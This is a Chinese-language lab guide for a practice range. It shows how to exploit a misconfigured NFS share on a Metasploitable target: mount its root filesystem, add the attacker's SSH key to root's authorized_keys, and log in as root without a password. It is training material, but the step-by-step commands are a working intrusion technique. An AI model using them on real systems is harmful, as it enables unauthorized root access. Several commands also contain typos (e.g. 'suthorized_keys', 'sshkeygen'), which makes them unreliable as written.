實驗目的
1、了解Metasploitables靶機系統漏洞;
2、學習使用Metasploit。
實驗原理
msftables之利用Linux NFS共享目錄配置漏洞滲透。
實驗內容
msftables之利用Linux NFS共享目錄配置漏洞滲透。
實驗環境描述
1、學生機與實驗室網絡直連;
2、VPC1、VPC2與實驗室網絡直連。
實驗步驟
1、打開靶機(登陸用戶名:msfadmin 密碼:msfadmin),查看靶機的IP地址。
命令:ifconfig
2、打開滲透機(登陸用戶名:root 密碼:toor)並查看其IP地址。
命令:ifconfig
3、在滲透機kali上查看靶機上的nfs服務是否開啟
命令:rpcinfo –p 192.168.10.100
4、在滲透機kali上查看靶機上設置的遠程共享目錄列表
命令:showmount –e 192.168.10.100
5、生成rsa公鑰
命令:sshkeygen
6、在滲透機 /tmp目錄下新建文件夾msftables,以備后續掛載需求
命令:mkdir /tmp/msftables
7、把靶機192.168.10.100的根目錄掛載到滲透機上新建的/tmp/mstables/目錄下;
命令:mount –o nolock –t nfs 192.168.10.100:/ /tmp/msftables/
8、把滲透機上生成的公鑰追加到靶機的authorized_keys下
命令:cat /root/.ssh/id_rsa.pub >> /tmp/msftables/root/.ssh/suthorized_keys
9、實現無密碼ssh登錄
命令:ssh root@192.168.10.100
10、 查看ip地址檢測是否已登錄到靶機
命令:ifconfig